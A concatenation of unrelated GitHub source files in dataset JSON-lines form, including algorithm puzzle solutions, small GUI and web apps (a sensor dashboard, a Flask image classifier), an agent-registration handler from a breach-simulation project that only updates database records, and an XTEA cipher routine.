classifiers: \")\n        \n        with open(\"data/\" + self.dataSets[choice] + \"/categoryClassifier.bin\", 'rb') as binFile:\n            self.classifierCat = pickle.load(binFile)\n\n        with open(\"data/\" + self.dataSets[choice] + \"/eventClassifier.bin\", 'rb') as binFile:\n            self.classifierBi = pickle.load(binFile)\n        \n        choice = int(input(\"Select a dataset with event candidates that need event detection: \"))\n\n        with open(\"data/\" + self.dataSets[choice] + \"/eventCandidates.json\") as jsonFile:\n            self.candidates = json.load(jsonFile)\n    \n    def generateMarkers(self):\n        print(\"Creating Google Maps markers & add WIKI links...\")\n        \n        js = open('vis/map/js/markers.js','w')\n        js.write('var locations = [')\n\n        \n        for tweets,label in self.events:\n            writableCluster = ''\n            gh = []\n            i = 0\n            avgLon = 0\n            avgLat = 0\n            #tweets = sorted(tweets, key=itemgetter('unixTime'));\n            \n            for tweet in tweets:\n                i = i + 1\n                gh.append(tweet['geoHash'])\n                avgLon += float(tweet[\"lon\"])\n                avgLat += float(tweet[\"lat\"])\n                # backslashes for multiline strings in Javascript\n                writableCluster += \"{} {} {} {}<br/><br/>\".format(tweet['localTime'], tweet['geoHash'], tweet['user'], tweet['text']).replace(\"'\", \"\\\\'\")\n                # Determine the Cartesian (ordinary) mean of the coordinates; the deviation (due to the shape\n                # of the earth) will probably not be large, since this concerns a small patch of the earth...\n                # In other words, we briefly pretend that the earth is flat ;-)\n            avgLon /= i\n            avgLat /= i\n            #writableCluster += \"<br/>
\" + str(ngrams).replace(\"'\", \"\\\\'\")\n js.write(\"['{}', {}, {}, '{}'],\".format(writableCluster,avgLat,avgLon,label))\n js.write('];')\n js.close()\n \n# DEMO\nif __name__ == \"__main__\":\n detective = EventDetective()\n detective.generateMarkers()","repo_name":"daviddekleer/EventDetective","sub_path":"EventDetective.py","file_name":"EventDetective.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18405585649","text":"from itertools import accumulate; from math import floor,ceil,sqrt; import operator; import random; import string; from bisect import *; from collections import deque, defaultdict, Counter, OrderedDict; from functools import reduce,cache; from heapq import *; import unittest; from typing import List,Optional; from functools import cache; from operator import lt, gt\nfrom binary_tree_tester import ser,des; from a_linked_list import make_linked_list\ndef get_sol(): return Solution()\n# https://www.youtube.com/watch?v=4wNXkhAky3s&t=1164s\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n BUY,SELL=0,1\n @cache\n def recur(i,state):\n if i>=n: return 0\n if state==BUY:\n option1=prices[i]+recur(i+2,SELL)\n option2=recur(i+1,BUY)\n else:\n option1=-prices[i]+recur(i+1,BUY)\n option2=recur(i+1,SELL)\n return max(option1,option2)\n\n n=len(prices)\n return recur(0,SELL)\nclass Solution3:\n def maxProfit(self, prices):\n if not prices:\n return 0\n n = len(prices)\n in_hand,no_stock,cooldown = 1,0,-1\n dp = {}\n def f(i, state):\n if i == n: return 0\n if (i, state) in dp: return dp[(i, state)]\n if state == cooldown: # after cooldown go to no_stock state\n dp[(i, state)] = f(i + 1, no_stock)\n if state == no_stock:\n dp[(i, state)] = max(f(i + 1, no_stock), f(i + 1, in_hand) - prices[i])\n if state == in_hand:\n dp[(i, state)] = max(prices[i] + f(i + 1, cooldown), f(i + 1, in_hand))\n return dp[(i, state)]\n return f(0,0)\n\nclass Solution2:\n def maxProfit(self, prices: List[int]) -> int:\n n=len(prices)\n no_stock,in_hand,sold =[0]*n,[0]*n,[0]*n\n in_hand[0]=0-prices[0]\n for i in range(1,n):\n no_stock[i]=max(no_stock[i-1],sold[i-1])\n in_hand[i]=max(in_hand[i-1],no_stock[i-1]-prices[i])\n sold[i]=in_hand[i-1]+prices[i]\n return max(no_stock[-1],in_hand[-1],sold[-1])\n\nclass Tester(unittest.TestCase):\n def test01(self):\n self.assertEqual(3,get_sol().maxProfit([1,2,3,0,2]))\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc309.py","file_name":"lc309.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"30477003598","text":"import PySimpleGUI as sg\n\nnumberOf = 1\n\nstudent_name = 'Mike Dong'\nmark = [[],\n []]\n\ncolumn = [[sg.Button('Add', size=(23,2))]]\n\n\n#column.remove([sg.Button('Add', size=(23,2))])\ndel column[len(column)-1]\n\nfor x in range(numberOf):\n column.append([sg.Text('Expectation ', text_color = 'black', justification = 'left'), sg.InputText(' ', size= (10, 1))],)\n column.append([sg.Text('Mark ', text_color = 'black', justification = 'left'), sg.InputText(' ', size= (10, 1))],)\n column.append([sg.Text(' ', justification = 'right'), sg.Checkbox(' ')],)\n column.append([sg.Text('_' * 100, size=(23, 1))],)\n column.append([sg.Button('Add', size=(23,2), bind_return_key = True)],)\n\n\nlayout = [[sg.Text('Mark entry - ' + student_name, size=(21, 1), font=(\"Helvetica\", 15), justification = 
'center')],\n[sg.Radio('Test ', 'RADIO1', default=True, text_color = 'red'), sg.Radio('Assignment ', 'RADIO1', text_color = 'blue')],\n[sg.Radio('Presentation ', 'RADIO1', text_color = 'green'), sg.Radio('Quiz ', 'RADIO1', text_color = 'Yellow'), sg.Checkbox(' ')],\n[sg.Column(column,scrollable=True, size=(225,150))]]\n\n#event, values = sg.Window('Mark ', auto_size_text=True, default_element_size=(40, 1)).Layout(layout).Read()\nwindow = sg.FlexForm('Mark ', auto_size_text=True, default_element_size=(40, 1)).Layout(layout)\n\nwhile True:\n event, values = window.Read()\n if event is None:\n break\n","repo_name":"sidbmw/GRADESK","sub_path":"Python/practice2.py","file_name":"practice2.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"19735494661","text":"class solve:\n def __init__(self):\n x,y=map(int,input().split())\n p=x*x+y*y\n r=int(p**0.5)\n if r*r
<
p and (r%2 and x*y>0 or r%2==0 and x*y<0):\n print(\"white\")\n else:\n print(\"black\")\n \nobj=solve()","repo_name":"bhavikjain403/CodeForces","sub_path":"40A.py","file_name":"40A.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"36381838911","text":"# coding=utf-8\nfrom __future__ import absolute_import\nfrom django import template\nfrom django.conf import settings\n\n\nregister = template.Library()\n\n\n@register.filter\ndef get_avatar(user):\n try:\n return user.avatar.url\n except ValueError:\n return '%susers/img/empty_avatar.png' % settings.STATIC_URL\n","repo_name":"python-coach/microsocial","sub_path":"users/templatetags/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3288272623","text":"from turtle import Screen\nimport random\nimport time\nfrom car import Car\nfrom tartaruga import Tartaruga\n\nPLAYING = True\ncars = []\n\n#create the screen\nscreen = Screen()\nscreen.title(\"Turtle crossing\")\nscreen.screensize(600, 600)\nscreen.tracer(0)\nscreen.listen()\n\n#create the turtle\ntarta = Tartaruga()\ntarta.setpos(0, -300)\ntarta.setheading(90)\n\n#event handler to move the turtle\nscreen.onkey(tarta.move_up, \"Up\")\nscreen.onkey(tarta.move_down, \"Down\")\n\n#create the car(s)\ncar = Car()\nfor i in range(10):\n car = Car()\n cars.append(car)\n\n#main loop\nwhile PLAYING:\n time.sleep(0.04)\n screen.update()\n screen.tracer(0)\n for car in cars:\n car.move()\n type(cars)\n\n\n\n\nscreen.exitonclick()\n\n","repo_name":"almolinagithub/turtle_crossing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40542792692","text":"from contextlib import suppress\nfrom datetime import datetime\nfrom ipaddress import IPv4Interface\nfrom typing import Callable, List, Optional\n\nfrom common import AgentRegistrationData\nfrom common.types import SocketAddress\nfrom monkey_island.cc.models import Agent, CommunicationType, Machine\nfrom monkey_island.cc.repositories import (\n IAgentRepository,\n IMachineRepository,\n INodeRepository,\n UnknownRecordError,\n)\n\n\nclass handle_agent_registration:\n \"\"\"\n Update repositories when a new agent registers\n \"\"\"\n\n def __init__(\n self,\n machine_repository: IMachineRepository,\n agent_repository: IAgentRepository,\n node_repository: INodeRepository,\n get_current_datetime: Callable[[], datetime] = datetime.now,\n ):\n self._machine_repository = machine_repository\n self._agent_repository = agent_repository\n self._node_repository = node_repository\n self._get_current_datetime = get_current_datetime\n\n def __call__(self, agent_registration_data: AgentRegistrationData):\n machine = self._update_machine_repository(agent_registration_data)\n self._add_agent(agent_registration_data, machine)\n self._add_node_communication(agent_registration_data, machine)\n\n def _update_machine_repository(self, agent_registration_data: AgentRegistrationData) -> Machine:\n machine = self._find_existing_machine_to_update(agent_registration_data)\n\n if machine is None:\n machine = Machine(id=self._machine_repository.get_new_id())\n\n self._upsert_machine(machine, agent_registration_data)\n\n return machine\n\n def _find_existing_machine_to_update(\n self, agent_registration_data: 
AgentRegistrationData\n ) -> Optional[Machine]:\n with suppress(UnknownRecordError):\n return self._machine_repository.get_machine_by_hardware_id(\n agent_registration_data.machine_hardware_id\n )\n\n for network_interface in agent_registration_data.network_interfaces:\n with suppress(UnknownRecordError):\n # NOTE: For now, assume IPs are unique. In reality, two machines could share the\n # same IP if there's a router between them.\n return self._machine_repository.get_machines_by_ip(network_interface.ip)[0]\n\n return None\n\n def _upsert_machine(self, machine: Machine, agent_registration_data: AgentRegistrationData):\n self._update_hardware_id(machine, agent_registration_data)\n self._update_network_interfaces(machine, agent_registration_data)\n\n self._machine_repository.upsert_machine(machine)\n\n def _update_hardware_id(self, machine: Machine, agent_registration_data: AgentRegistrationData):\n if (\n machine.hardware_id is not None\n and machine.hardware_id != agent_registration_data.machine_hardware_id\n ):\n raise Exception(\n f\"Hardware ID mismatch:\\n\\tMachine: {machine}\\n\\t\"\n f\"AgentRegistrationData: {agent_registration_data}\"\n )\n\n machine.hardware_id = agent_registration_data.machine_hardware_id\n\n def _update_network_interfaces(\n self, machine: Machine, agent_registration_data: AgentRegistrationData\n ):\n updated_network_interfaces: List[IPv4Interface] = []\n agent_registration_data_ips = set(\n map(lambda iface: iface.ip, agent_registration_data.network_interfaces)\n )\n\n # Prefer interfaces provided by the AgentRegistrationData to those in the Machine record.\n # The AgentRegistrationData was collected while running on the machine, whereas the Machine\n # data may have only been collected from a scan. For example, the Machine and\n # AgentRedistrationData may have the same IP with a different subnet mask.\n for interface in machine.network_interfaces:\n if interface.ip not in agent_registration_data_ips:\n updated_network_interfaces.append(interface)\n\n updated_network_interfaces.extend(agent_registration_data.network_interfaces)\n\n machine.network_interfaces = sorted(updated_network_interfaces)\n\n def _add_agent(self, agent_registration_data: AgentRegistrationData, machine: Machine):\n new_agent = Agent(\n id=agent_registration_data.id,\n machine_id=machine.id,\n registration_time=self._get_current_datetime(),\n start_time=agent_registration_data.start_time,\n parent_id=agent_registration_data.parent_id,\n cc_server=agent_registration_data.cc_server,\n sha256=agent_registration_data.sha256,\n )\n self._agent_repository.upsert_agent(new_agent)\n\n def _add_node_communication(\n self, agent_registration_data: AgentRegistrationData, src_machine: Machine\n ):\n dst_machine = self._get_or_create_cc_machine(agent_registration_data.cc_server)\n\n self._node_repository.upsert_communication(\n src_machine.id, dst_machine.id, CommunicationType.CC\n )\n\n def _get_or_create_cc_machine(self, cc_server: SocketAddress) -> Machine:\n dst_ip = cc_server.ip\n\n try:\n return self._machine_repository.get_machines_by_ip(dst_ip)[0]\n except UnknownRecordError:\n new_machine = Machine(\n id=self._machine_repository.get_new_id(), network_interfaces=[IPv4Interface(dst_ip)]\n )\n self._machine_repository.upsert_machine(new_machine)\n\n return 
new_machine\n","repo_name":"guardicore/monkey","sub_path":"monkey/monkey_island/cc/island_event_handlers/handle_agent_registration.py","file_name":"handle_agent_registration.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","stars":6367,"dataset":"github-code","pt":"21"} +{"seq_id":"5410722971","text":"\n'''\n6-11.转换。\n(a)创建一个从整型到IP地址的转换程序,如下格式;WWW.XXX.YYY.ZZZ。\n(b)更新你的程序,使之可以逆转换。\n'''\n\ndef num2ip(num):\n num = int(num)\n if num < 0 or num >= pow(2, 32):\n raise ValueError('input number is invalid')\n base = 0b11111111\n f = lambda i: '{:}'.format(i)\n ip = []\n for i in range(4):\n ip.insert(0, f(num & base))\n num = num >> 8\n return '.'.join(ip)\n\ndef ip2num(ip):\n ip = str(ip)\n ns = [int(i) for i in ip.split(r'.')]\n num = 0\n for i in range(4):\n num = (num << 8) + ns[i]\n return num\n\ndef main():\n ips = ['192.168.1.2', '0.184.244.124', '1.98.52.157', \n '1.238.190.8', '0.52.95.231', '140.82.109.216']\n for ip in ips:\n print('IP: {:15} number: {:15}'.format(ip, ip2num(ip)))\n \n nums = [3232235778, 12121212, 23213213, 32423432, 3432423, 2354212312]\n for num in nums:\n print('IP: {:15} number: {:15}'.format(num2ip(num), num))\n\nif __name__ == '__main__':\n main()","repo_name":"Zjianglin/Python_programming_demo","sub_path":"chapter6/6-11.py","file_name":"6-11.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9437257540","text":"import pickle\nimport flask\nimport dash\nfrom dash.dependencies import Output, Event, Input\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly\nimport random\nimport plotly.graph_objs as go\nfrom collections import deque\nimport bridge_controller as bc\nimport machine_learning as ml\nimport numpy as np\n\nX_temp = deque(maxlen=20)\nX_temp.append(1)\nY_temp = deque(maxlen=20)\n\nX_pres = deque(maxlen=20)\nX_pres.append(1)\nY_pres = deque(maxlen=20)\n\nX_humi = deque(maxlen=20)\nX_humi.append(1)\nY_humi = deque(maxlen=20)\n\nX_conc = deque(maxlen=20)\nX_conc.append(1)\nY_conc = deque(maxlen=20)\n\napp = dash.Dash(__name__, processes=4)\n\ndef get_stats(X):\n min = str(round(np.min(X), 2))\n max = str(round(np.max(X), 2))\n std = str(round(np.std(X), 2))\n avg = str(round(np.mean(X), 2))\n med = str(round(np.median(X), 2))\n return min, max, std, avg, med\n\napp.layout = html.Div(\n [\n html.Div([\n html.Img(src=\"https://i.imgur.com/ihOBYtR.png\",style={\"display\":\"block\",\"width\":125,\"margin\":\"auto auto\"}),\n html.H2('Particle Accelerator Observation Tool',style={\"display\":\"inline-block\"}),\n html.Div([\n html.Button('Enable Laser 1', id='button',style={\"border\":\"2px solid #1589FF\",\"width\":100,\"margin\":5,\"height\":75,\"background\":\"none\"}),\n html.Button('Enable Laser 2', id='button2',style={\"border\":\"2px solid #1589FF\",\"width\":100,\"margin\":5,\"height\":75,\"background\":\"none\"}),\n html.Button('Switch to PIXE', id='button3',style={\"border\":\"2px solid #1589FF\",\"width\":100,\"margin\":5,\"height\":75,\"background\":\"none\"}),\n html.Button('Switch to Irad', id='button4',style={\"border\":\"2px solid #1589FF\",\"width\":100,\"margin\":5,\"height\":75,\"background\":\"none\"})\n ])\n ],style={\"border-right\":\"2px solid blue\"}),\n html.Div([\n html.Div([\n #html.Button([\n html.Img(id=\"cam\",src=\"http://192.168.162.254:10000/cgi-bin/video.cgi?msubmenu=mjpg\",width=\"500\",height=\"400\", 
style={\"display\":\"block\",\"margin-top\":\"20px\"}),\n #],id=\"cam\"),\n html.Img(id=\"usbcam\",src=\"http://127.0.0.1:8081\",width=\"500\",height=\"400\",style={'margin-top':50})\n ]),\n html.Div([\n html.Div([\n html.P('Stats here', id='live-graph-stats'),\n dcc.Graph(id='live-graph',style={\"width\":600,\"height\":400},config={'displayModeBar':False}),\n html.P('Stats here', id='live-graph-stats2'),\n dcc.Graph(id='live-graph2',style={\"width\":600,\"height\":400},config={'displayModeBar':False})\n ]),\n html.Div([\n html.P('Stats here', id='live-graph-stats3'),\n dcc.Graph(id='live-graph3',style={\"width\":600,\"height\":400},config={'displayModeBar':False}),\n html.P('Stats here', id='live-graph-stats4'),\n dcc.Graph(id='live-graph4',style={\"width\":600,\"height\":400},config={'displayModeBar':False})\n ]),\n dcc.Interval(\n id='graph-update',\n interval=2*1000\n ),\n\n ],style={\"display\":\"grid\",\"grid-template-columns\":\"50% 50%\"}),\n html.P('Composition here', id='spectrum-stats'),\n dcc.Graph(id='spectrum-graph',style={\"width\":1500,\"height\":400},config={'displayModeBar':False}),\n ],style={\"padding\":20,\"display\":\"grid\",\"grid-template-columns\":\"auto auto\"}),\n\n ],style={\"display\":\"grid\",\"grid-template-columns\":\"275px auto\"})\napp.css.append_css({\"external_url\": \"https://codepen.io/sturzamihai/pen/LJWmQL.css\"})\n@app.callback(Output('spectrum-graph', 'figure'),\n events=[Event('graph-update', 'interval')])\ndef update_graph_scatter():\n print('SPECTRUM')\n spectrum, pred = ml.analyze('../Silicone Drift Detector/SpectrumData.mca')\n #spectrum, pred = ml.analyze('./Data/611_Magnet.mca')\n data = plotly.graph_objs.Scatter(\n x=list(range(4096)),\n y=spectrum,\n name='Scatter',\n mode= 'lines+markers'\n )\n\n return {'data': [data]}\n\n@app.callback(\n Output('spectrum-stats', 'children'),\n events=[Event('graph-update', 'interval')])\ndef display_stats():\n spectrum, pred = ml.analyze('../Silicone Drift Detector/SpectrumData.mca')\n pred = [str(x) for x in pred[0]]\n print(pred)\n stats_string = 'Composition: '+ \\\n 'SiO2: '+pred[0]+' Na2O: '+pred[1]+' CaO: '+pred[2]+' Al2O3: '+pred[3]\n print(stats_string)\n return stats_string\n\n@app.callback(Output('cam','children'), [Input('cam', 'n_clicks')])\ndef on_click(bclick):\n print(bclick)\n\n@app.callback(Output('live-graph', 'figure'),\n events=[Event('graph-update', 'interval')])\ndef update_graph_scatter():\n response = bc.analog_read_pin('rtua', 0)\n X_temp.append(X_temp[-1]+1)\n Y_temp.append(response)\n data = plotly.graph_objs.Scatter(\n x=list(X_temp),\n y=list(Y_temp),\n name='Scatter',\n mode= 'lines+markers'\n )\n\n return {'data': [data]}\n\n@app.callback(\n Output('live-graph-stats', 'children'),\n events=[Event('graph-update', 'interval')])\ndef display_stats():\n stats = get_stats(Y_temp)\n stats_string = 'Stats for last 20 samples:\\n'+ \\\n 'min: '+stats[0]+'\\nmax: '+stats[1]+'\\nstd: '+stats[2]+'\\navg: '+stats[3]+'\\nmed: '+stats[4]\n print(stats_string)\n return stats_string\n\n\n@app.callback(Output('live-graph2', 'figure'),\n events=[Event('graph-update', 'interval')])\ndef update_graph_scatter():\n response = bc.analog_read_pin('rtua', 1)\n X_pres.append(X_pres[-1]+1)\n Y_pres.append(response)\n data = plotly.graph_objs.Scatter(\n x=list(X_pres),\n y=list(Y_pres),\n name='Scatter',\n mode= 'lines+markers'\n )\n\n return {'data': [data]}\n\n@app.callback(\n Output('live-graph-stats2', 'children'),\n events=[Event('graph-update', 'interval')])\ndef display_stats():\n stats = 
get_stats(Y_pres)\n    stats_string = 'Stats for last 20 samples:\\n'+ \\\n        'min: '+stats[0]+'\\nmax: '+stats[1]+'\\nstd: '+stats[2]+'\\navg: '+stats[3]+'\\nmed: '+stats[4]\n    print(stats_string)\n    return stats_string\n\n@app.callback(Output('live-graph3', 'figure'),\n              events=[Event('graph-update', 'interval')])\ndef update_graph_scatter():\n    response = bc.analog_read_pin('rtub', 0)\n    X_humi.append(X_humi[-1]+1)\n    Y_humi.append(response)\n    data = plotly.graph_objs.Scatter(\n            x=list(X_humi),\n            y=list(Y_humi),\n            name='Scatter',\n            mode= 'lines+markers'\n            )\n\n    return {'data': [data]}\n\n@app.callback(\n    Output('live-graph-stats3', 'children'),\n    events=[Event('graph-update', 'interval')])\ndef display_stats():\n    stats = get_stats(Y_humi)\n    stats_string = 'Stats for last 20 samples:\\n'+ \\\n        'min: '+stats[0]+'\\nmax: '+stats[1]+'\\nstd: '+stats[2]+'\\navg: '+stats[3]+'\\nmed: '+stats[4]\n    print(stats_string)\n    return stats_string\n\n@app.callback(Output('live-graph4', 'figure'),\n              events=[Event('graph-update', 'interval')])\ndef update_graph_scatter():\n    response = bc.analog_read_pin('rtub', 1)\n    X_conc.append(X_conc[-1]+1)\n    Y_conc.append(response)\n    data = plotly.graph_objs.Scatter(\n            x=list(X_conc),\n            y=list(Y_conc),\n            name='Scatter',\n            mode= 'lines+markers'\n            )\n\n    return {'data': [data]}\n\n@app.callback(\n    Output('live-graph-stats4', 'children'),\n    events=[Event('graph-update', 'interval')])\ndef display_stats():\n    stats = get_stats(Y_conc)\n    stats_string = 'Stats for last 20 samples:\\n'+ \\\n        'min: '+stats[0]+'\\nmax: '+stats[1]+'\\nstd: '+stats[2]+'\\navg: '+stats[3]+'\\nmed: '+stats[4]\n    print(stats_string)\n    return stats_string\n\nif __name__ == '__main__':\n    app.run_server(debug=True)\n","repo_name":"paulbricman/parrot","sub_path":"Server/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":7992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42376522654","text":"from flask_login import login_user\nfrom tests.factories import UserFactory\nfrom PEC.settings.forms import AccountDetailForm\n\n\nclass TestAccountDetailForm:\n\n    def test_valid(self, user):\n        login_user(user)\n        form = AccountDetailForm()\n        form.first_name.data = 'Other'\n        form.last_name.data = 'Name'\n        form.email.data = user.email\n        assert form.validate() is True\n\n    def test_duplicate_email(self, user):\n        login_user(user)\n        user2 = UserFactory()\n        form = AccountDetailForm()\n        form.first_name.data = 'Other'\n        form.last_name.data = 'Name'\n        form.email.data = user2.email\n        assert form.validate() is False\n","repo_name":"UgiR/UIC-PEC","sub_path":"tests/test_settings/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21070501399","text":"from image_test.nn.neuralnetwork import NeuralNetwork\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom sklearn import datasets\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nprint(\"[INFO] loading MNIST (sample) dataset...\")\ndigits = datasets.load_digits()\ndata = digits.data.astype(\"float\")\n# normalize the data to the range [0, 1]\ndata = (data - data.min()) / (data.max() - data.min())\nprint(\"[INFO] samples: {}, dim: {}\".format(data.shape[0], data.shape[1]))\n\ntrainX, testX, trainY, testY = train_test_split(data, digits.target, test_size=0.25)\n\ntrainY = 
LabelBinarizer().fit_transform(trainY)\ntestY = LabelBinarizer().fit_transform(testY)\n\nprint(\"[INFO] training network...\")\nnn = NeuralNetwork([trainX.shape[1], 32, 16, 10])\nprint(\"[INFO] {}\".format(nn))\nnn.fit(trainX, trainY, epochs=1000)\n\nprint(\"[INFO] evaluating network...\")\npredictions = nn.predict(testX)\npredictions = predictions.argmax(axis=1)\nprint(classification_report(testY.argmax(axis=1), predictions))\n\n\nplt.style.use(\"ggplot\")\nplt.figure()\nplt.plot(nn.epoch, nn.loss)\nplt.title(\"Training loss\")\nplt.xlabel(\"Epoch #\")\nplt.ylabel(\"Loss\")\nplt.show()\n","repo_name":"lmlzk/Deeplearning_test","sub_path":"image_test/nn_mnist.py","file_name":"nn_mnist.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2974822894","text":"from fileinput import filename\r\nimport os\r\nimport urllib.request\r\nfrom flask import Flask, flash, request, redirect, url_for, render_template\r\nfrom werkzeug.utils import secure_filename\r\nimport keras\r\nfrom keras.models import load_model\r\n#from tensorflow import keras\r\nfrom PIL import Image, ImageOps\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\n\r\n\r\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])\r\nUPLOAD_FOLDER = r'D:\\kishan-know-backend\\static\\uploads'\r\nfilename=''\r\n\r\napp = Flask(__name__)\r\napp.secret_key = \"secret key\"\r\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\r\napp.config['MAX_CONTENT_LENGTH'] = 400 * 400 * 400\r\n\r\n\r\ndef allowed_file(filename):\r\n\treturn '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\r\n\t\r\n@app.route('/')\r\ndef upload_form():\r\n\treturn render_template('upload.html')\r\n\r\n@app.route('/', methods=['POST'])\r\ndef upload_image():\r\n\tif 'file' not in request.files:\r\n\t\tflash('No file part')\r\n\t\treturn redirect(request.url)\r\n\tfile = request.files['file']\r\n\tif file.filename == '':\r\n\t\tflash('No image selected for uploading')\r\n\t\treturn redirect(request.url)\r\n\tif file and allowed_file(file.filename):\r\n\t\tfilename = secure_filename(file.filename)\r\n\t\tnew_name = os.path.join(app.config['UPLOAD_FOLDER'], filename)\r\n\t\tprint(type(new_name))\r\n\t\tfile.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\r\n\t\t#print('upload_image filename: ' + filename)\r\n\t\tflash('Image successfully uploaded and displayed below')\r\n\r\n\r\n\r\n\t\tmodel = keras.models.load_model(r'keras_model.h5')\r\n\t\tdata = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\r\n\t\t# Replace this with the path to your image\r\n\t\t#str_path= image_path\r\n\t\timage = Image.open(new_name)\r\n\t\t#resize the image to a 224x224 with the same strategy as in TM2:\r\n\t\t#resizing the image to be at least 224x224 and then cropping from the center\r\n\t\tsize = (224, 224)\r\n\t\timage = ImageOps.fit(image, size, Image.ANTIALIAS)\r\n\t\t#turn the image into a numpy array\r\n\t\timage_array = np.asarray(image)\r\n\t\t# Normalize the image\r\n\t\tnormalized_image_array = (image_array.astype(np.float32) / 127.0) - 1\r\n\t\t# Load the image into the array\r\n\t\tdata[0] = normalized_image_array\r\n\r\n\t\t# run the inference\r\n\t\tprediction = model.predict(data)\r\n\t\tif prediction[0][1] > prediction[0][0]:\r\n\t\t\tflash('It is infected')\r\n\t\telse:\r\n\t\t\tflash('It is safe')\r\n\t\tprint(type(prediction))\r\n\r\n\r\n\t\treturn render_template('upload.html', filename=filename)\r\n\telse:\r\n\t\tflash('Allowed image 
types are -> png, jpg, jpeg, gif')\r\n\t\treturn redirect(request.url)\r\n\r\n@app.route('/display/')\r\ndef display_image(filename):\r\n    return redirect(url_for('static', filename='uploads/' + filename), code=301)\r\n\r\n'''\r\nmodel = keras.models.load_model(r'keras_model.h5')\r\ndata = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\r\n# Replace this with the path to your image\r\n#str_path= image_path\r\nimage = Image.open(filename)\r\n#resize the image to a 224x224 with the same strategy as in TM2:\r\n#resizing the image to be at least 224x224 and then cropping from the center\r\nsize = (224, 224)\r\nimage = ImageOps.fit(image, size, Image.ANTIALIAS)\r\n#turn the image into a numpy array\r\nimage_array = np.asarray(image)\r\n# Normalize the image\r\nnormalized_image_array = (image_array.astype(np.float32) / 127.0) - 1\r\n# Load the image into the array\r\ndata[0] = normalized_image_array\r\n\r\n# run the inference\r\nprediction = model.predict(data)\r\nprint(prediction)\r\nprint(type(prediction))\r\n'''\r\n\r\nif __name__ == \"__main__\":\r\n    app.run()","repo_name":"arch-cl0wn/kishan-know-backend","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36064704055","text":"from __future__ import print_function\n\nimport sys\nimport time\nimport subprocess\nimport multiprocessing as mp\n\nfrom threading import Thread\n\nCOUNT = 100000000\n\n\ndef countdown(n):\n    \"\"\" I am just a quick CPU bound method\"\"\"\n    while n > 0:\n        n -= 1\n    return\n\n\ndef main(thread_count):\n    start = time.time()\n    # create CPU - 1 processes to spin CPU uselessly\n    processes = [subprocess.Popen(['python2.7', 'spin.py'])\n                 for i in range(mp.cpu_count() - 1)]\n    # create new threads and spawn them here, keeping a handle on each one\n    threads = []\n    for i in range(thread_count):\n        t = Thread(target=countdown, args=(COUNT / thread_count,))\n        t.start()\n        threads.append(t)\n    # wait for all the threads to finish (not just the last one created)\n    for t in threads:\n        t.join()\n\n    for p in processes:\n        p.terminate()\n    end = time.time()\n    print('Time:', end - start)\n\n\nif __name__ == '__main__':\n    if len(sys.argv) < 2:\n        print(\"USAGE :: %s \" % (__file__))\n        sys.exit(0)\n    main(int(sys.argv[1]))\n","repo_name":"piyusql/juggler","sub_path":"GIL/before_talk/mtspin.py","file_name":"mtspin.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18503412871","text":"from ctypes import *\nfrom typing import List\nfrom .Constance import magic_number_delta as delta\n\n\ndef encrypt(v, k: List[int], run_round: int = 32):\n    v0 = c_uint32(v[0])\n    v1 = c_uint32(v[1])\n    v_sum = c_uint32(0)\n    for i in range(run_round):\n        v0.value += (((v1.value << 4) ^ (v1.value >> 5)) +\n                     v1.value) ^ (v_sum.value+k[v_sum.value & 3])\n        v_sum.value += delta\n        v1.value += (((v0.value << 4) ^ (v0.value >> 5)) +\n                     v0.value) ^ (v_sum.value+k[(v_sum.value >> 11) & 3])\n    return v0.value, v1.value\n\n\ndef decrypt(v, k: List[int], run_round: int = 32):\n    v0 = c_uint32(v[0])\n    v1 = c_uint32(v[1])\n    v_sum = c_uint32(delta * run_round)\n    for i in range(run_round):\n        v1.value -= (((v0.value << 4) ^ (v0.value >> 5)) +\n                     v0.value) ^ (v_sum.value+k[(v_sum.value >> 11) & 3])\n        v_sum.value -= 